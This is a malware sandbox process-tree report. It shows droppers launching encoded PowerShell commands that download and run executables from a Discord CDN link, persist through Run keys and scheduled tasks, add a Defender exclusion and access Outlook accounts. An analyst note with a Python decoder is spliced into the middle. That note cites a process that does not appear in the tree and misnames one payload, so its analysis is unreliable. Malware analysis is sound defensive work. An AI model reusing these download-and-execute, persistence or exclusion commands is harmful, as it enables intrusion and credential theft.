          command line: "C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE"
          - Executes dropped EXE
        [5] C:\Windows\system32\cmd.exe
            command line: "cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
          [6] C:\Users\Admin\AppData\Local\Temp\0.exe
              command line: C:\Users\Admin\AppData\Local\Temp\0.exe
              - Executes dropped EXE
            [7] C:\Windows\system32\cmd.exe
                command line: "cmd" /C C:\Users\Admin\AppData\Local\Temp\uQIyezHYEb.exe
              [8] C:\Users\Admin\AppData\Local\Temp\uQIyezHYEb.exe
                  command line: C:\Users\Admin\AppData\Local\Temp\uQIyezHYEb.exe
                  - Executes dropped EXE
                  - Checks computer location settings
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                    - Blocklisted process makes network request
                  [10] C:\Users\Admin\AppData\Roaming\JDSG3.exe
                       command line: "C:\Users\Admin\AppData\Roaming\JDSG3.exe"
                       - Executes dropped EXE
                       - Suspicious use of SetThreadContext
                    [11] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                         command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            [7] C:\Windows\system32\cmd.exe
                command line: "cmd" /C C:\Users\Admin\AppData\Local\Temp\sSHdLPmGvR.exe
              [8] C:\Users\Admin\AppData\Local\Temp\sSHdLPmGvR.exe
                  command line: C:\Users\Admin\AppData\Local\Temp\sSHdLPmGvR.exe
                  - Executes dropped EXE
                  - Checks computer location settings
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                    - Blocklisted process makes network request
                  [10] C:\Users\Admin\AppData\Roaming\JDSG4.exe
                       command line: "C:\Users\Admin\AppData\Roaming\JDSG4.exe"
                       - Executes dropped EXE
                       - Suspicious use of SetThreadContext
                    [11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                         command line: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
                         - Adds Run key to start application
                    [11] C:\Windows\SysWOW64\cmd.exe
                         command line: "cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                      [12] C:\Windows\SysWOW64\schtasks.exe
                           command line: schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                           - Creates scheduled task(s)
                    [11] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                         command line: #cmd
            [7] C:\Windows\system32\cmd.exe
                command line: "cmd" /C C:\Users\Admin\AppData\Local\Temp\gWp3Y1Z5zl.exe
              [8] C:\Users\Admin\AppData\Local\Temp\gWp3Y1Z5zl.exe
                  command line: C:\Users\Admin\AppData\Local\Temp\gWp3Y1Z5zl.exe
                  - Executes dropped EXE
                  - Checks computer location settings
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                    - Blocklisted process makes network request
                  [10] C:\Users\Admin\AppData\Roaming\JDSDS4.exe
                       command line: "C:\Users\Admin\AppData\Roaming\JDSDS4.exe"
                       - Executes dropped EXE
                       - Suspicious use of SetThreadContext
                    [11] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                         command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            [7] C:\Windows\system32\cmd.exe
                command line: "cmd" /C C:\Users\Admin\AppData\Local\Temp\MsLpqg1mkp.exe
              [8] C:\Users\Admin\AppData\Local\Temp\MsLpqg1mkp.exe
                  command line: C:\Users\Admin\AppData\Local\Temp\MsLpqg1mkp.exe
                  - Executes dropped EXE
                  - Checks computer location settings
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAYwBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADUANAAzADMANgAxADcANAAxADYAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGoAdABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBrAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBrAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABPAFMAQQAxADIALgBlAHgAZQAnACkAKQA8ACMAZABoAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwByAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAbABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATwBTAEEAMQAyAC4AZQB4AGUAJwApADwAIwB1AG4AcQAjAD4A"
                    - Blocklisted process makes network request
                  [10] C:\Users\Admin\AppData\Roaming\POSA12.exe
                       command line: "C:\Users\Admin\AppData\Roaming\POSA12.exe"
                       - Executes dropped EXE
                       - Suspicious use of SetThreadContext
                    [11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                         command line: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
                         - Adds Run key to start application
                    [11] C:\Windows\SysWOW64\cmd.exe
                         command line: "cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                      [12] C:\Windows\SysWOW64\schtasks.exe
                           command line: schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                           - Creates scheduled task(s)
                    [11] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                         command line: #cmd
                    [11] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                         command line: #cmd
            [7] C:\Windows\system32\cmd.exe
                command line: "cmd" /C C:\Users\Admin\AppData\Local\Temp\35JrmltklD.exe
              [8] C:\Users\Admin\AppData\Local\Temp\35JrmltklD.exe
                  command line: C:\Users\Admin\AppData\Local\Temp\35JrmltklD.exe
                  - Executes dropped EXE
                  - Checks computer location settings
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                    - Blocklisted process makes network request
                  [10] C:\Users\Admin\AppData\Roaming\MNZXHA36.exe
                       command line: "C:\Users\Admin\AppData\Roaming\MNZXHA36.exe"
                       - Executes dropped EXE
                    [11] C:\Windows\SysWOW64\WerFault.exe
                         command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 804
                         - Program crash
            [7] C:\Windows\system32\cmd.exe
                command line: "cmd" /C C:\Users\Admin\AppData\Local\Temp\4daUBDWNly.exe
              [8] C:\Users\Admin\AppData\Local\Temp\4daUBDWNly.exe
                  command line: C:\Users\Admin\AppData\Local\Temp\4daUBDWNly.exe
                  - Executes dropped EXE
                  - Checks computer location settings
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                    - Blocklisted process makes network request
                  [10] C:\Users\Admin\AppData\Roaming\POIXCB3.exe
                       command line: "C:\Users\Admin\AppData\Roaming\POIXCB3.exe"
                       - Executes dropped EXE
                       - Adds Run key to start application
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\YiuliBraIW.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\YiuliBraIW.exeC:\Users\Admin\AppData\Local\Temp\YiuliBraIW.exe8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe"C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"11⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\fJLyuMh29f.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\fJLyuMh29f.exeC:\Users\Admin\AppData\Local\Temp\fJLyuMh29f.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\QHGJASD27.exe"C:\Users\Admin\AppData\Roaming\QHGJASD27.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \WindowsFilerar /tr "C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \WindowsFilerar /tr "C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f12⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsFilerar';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsFilerar' -Value '"C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe"' -PropertyType 'String'11⤵
- Adds Run key to start application
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd11⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\z4BWkjnInT.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\z4BWkjnInT.exeC:\Users\Admin\AppData\Local\Temp\z4BWkjnInT.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADcAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYANwA3ADYAOQA0ADgAMwA2ADgAMgA3AC8ARABlAGYAZQBuAGQAZQByAFMAYwByAGUAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAZwBqAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB0AGMAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHIAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAUwBKAEQAUwBBAEsARABRAC4AZQB4AGUAJwApACkAPAAjAGwAZwB3ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGMAcABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGIAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAUwBKAEQAUwBBAEsARABRAC4AZQB4AGUAJwApADwAIwBwAGsAaQAjAD4A"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\LKSJDSAKDQ.exe"C:\Users\Admin\AppData\Roaming\LKSJDSAKDQ.exe"10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 80411⤵
- Program crash
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\RCAHrSufv7.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\RCAHrSufv7.exeC:\Users\Admin\AppData\Local\Temp\RCAHrSufv7.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\LKXMNX55.exe"C:\Users\Admin\AppData\Roaming\LKXMNX55.exe"10⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\UPuzEwySUY.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\UPuzEwySUY.exeC:\Users\Admin\AppData\Local\Temp\UPuzEwySUY.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\LKXMNBZX55.exe"C:\Users\Admin\AppData\Roaming\LKXMNBZX55.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd11⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd11⤵
-
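Analyst note on the `-EncodedCommand` values (added example, not part of the sandbox output): the two powershell.exe children whose argument survives in full (under z4BWkjnInT.exe above and under oVvR0Kg0to.exe further down) carry the script as base64 over UTF-16LE, with `<#abc#>` block comments inserted between tokens so the decoded text still reads as noise. Stripping the comments leaves a plain one-liner: sleep 170 seconds, download a file from cdn.discordapp.com into `$env:AppData` under the name of the next dropped executable (LKSJDSAKDQ.exe in the first case, POIXCB3.exe in the second), then `Start-Process` it, which matches the child that follows each of those lines. The script below is mine; it embeds the first value verbatim from the report, and the helper names are assumptions.

```python
"""Decode and de-obfuscate the -EncodedCommand PowerShell lines in the tree.

-EncodedCommand carries the script as base64 over UTF-16LE text.  The
droppers above additionally sprinkle inline block comments (<#abc#>) between
tokens; removing them leaves a plain download-and-execute one-liner.
Added analyst example, not code from the sample or the sandbox.
"""
import base64
import re

# -EncodedCommand value from the powershell.exe line under z4BWkjnInT.exe,
# copied from the report; split into adjacent literals for readability only.
ENCODED = (
    "PAAjAHkAbgBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADcAMAA7ACgA"
    "TgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQA"
    "YQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAA"
    "NQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYANwA3ADYAOQA0ADgAMwA2ADgAMgA3AC8ARABlAGYAZQBuAGQA"
    "ZQByAFMAYwByAGUAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAZwBqAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQA"
    "aAAgADwAIwB0AGMAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHIA"
    "dwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAUwBKAEQAUwBBAEsARABRAC4AZQB4AGUAJwApACkA"
    "PAAjAGwAZwB3ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAA"
    "PAAjAGMAcABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAA"
    "RABhAHQAYQAgADwAIwBkAGIAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAUwBKAEQAUwBBAEsA"
    "RABRAC4AZQB4AGUAJwApADwAIwBwAGsAaQAjAD4A"
)

_BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)
_URL = re.compile(r"https?://[^\s'\")]+")
_SLEEP = re.compile(r"Start-Sleep\s+-Seconds\s+(\d+)", re.IGNORECASE)


def decode_encoded_command(b64: str) -> str:
    """Reverse -EncodedCommand: strict base64, then UTF-16LE."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Drop <# ... #> comments and the doubled spaces they leave behind."""
    text = _BLOCK_COMMENT.sub("", script)
    return re.sub(r"[ \t]{2,}", " ", text).strip()


def extract_urls(script: str) -> list:
    """URLs the script fetches (quote- and parenthesis-delimited)."""
    return _URL.findall(script)


def sleep_seconds(script: str) -> int:
    """Total seconds the script sleeps before acting, 0 if it does not."""
    return sum(int(n) for n in _SLEEP.findall(script))


def triage(b64: str) -> dict:
    """Decode, clean and summarise one -EncodedCommand value."""
    script = decode_encoded_command(b64)
    cleaned = strip_block_comments(script)
    return {
        "script": script,
        "cleaned": cleaned,
        "urls": extract_urls(cleaned),
        "sleep_seconds": sleep_seconds(cleaned),
    }


if __name__ == "__main__":
    summary = triage(ENCODED)
    print(summary["cleaned"])
    print("fetches", summary["urls"], "after sleeping", summary["sleep_seconds"], "s")
```

The 170-second `Start-Sleep` is worth keeping in mind when reproducing this: a short sandbox run never sees the download, which is why the report's long `max time kernel` matters for this sample.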
C:\Users\Admin\Downloads\614.exe"C:\Users\Admin\Downloads\614.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "svhosts" /sc ONLOGON /tr "C:\Users\Admin\Downloads\614.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\subdir\svchosts.exe"C:\Users\Admin\AppData\Roaming\subdir\svchosts.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "svhosts" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\subdir\svchosts.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Downloads\8.exe"C:\Users\Admin\Downloads\8.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Downloads\norza.exe"C:\Users\Admin\Downloads\norza.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\xrfqtvbjh.exe"C:\Users\Admin\AppData\Local\Temp\xrfqtvbjh.exe" C:\Users\Admin\AppData\Local\Temp\xkoyijrfu.qub3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\xrfqtvbjh.exe"C:\Users\Admin\AppData\Local\Temp\xrfqtvbjh.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\Downloads\7.exe"C:\Users\Admin\Downloads\7.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- NTFS ADS
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe3⤵
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe3⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe"C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- NTFS ADS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ePnxkugSsfE.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ePnxkugSsfE" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1CD8.tmp"3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe"C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\vvlpylntljvmqaumksedasijryuddvim"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\irwszoj"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\fxrz"4⤵
- Accesses Microsoft Outlook accounts
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\cgsjwvvsawjppvjamraresbjmoz"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\nixcxngtwebuzbxmvcmkoxwaudriri"4⤵
- Accesses Microsoft Outlook accounts
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\xdcnxgrnkmthbhtqmnzmrkqjdjbrstaaj"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\cgsjwvvsawjppvjamraresbjmoz"4⤵
- Registers COM server for autorun
- Drops file in Program Files directory
- Modifies registry class
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\eojpvqguazikadiegvmavcjqxigm"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\piwiwirvohawkjwixfhbgpdzgoyvgfsc"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\rkcs"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\rkcs"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\rkcs"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\piwiwirvohawkjwixfhbgpdzgoyvgfsc"4⤵
- Accesses Microsoft Outlook accounts
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\lrxktzwbxlwvyqoaiuiwgvcq"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\wudcushcluozjekerfupjiwhbnd"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\wudcushcluozjekerfupjiwhbnd"4⤵
- Accesses Microsoft Outlook accounts
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\goivukswzcgmlkyiiqhruvrqjtnata"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\goivukswzcgmlkyiiqhruvrqjtnata"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\wudcushcluozjekerfupjiwhbnd"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\edye"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\rzqpmevxzbm"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\pxdxlmk"4⤵
- Accesses Microsoft Outlook accounts
-
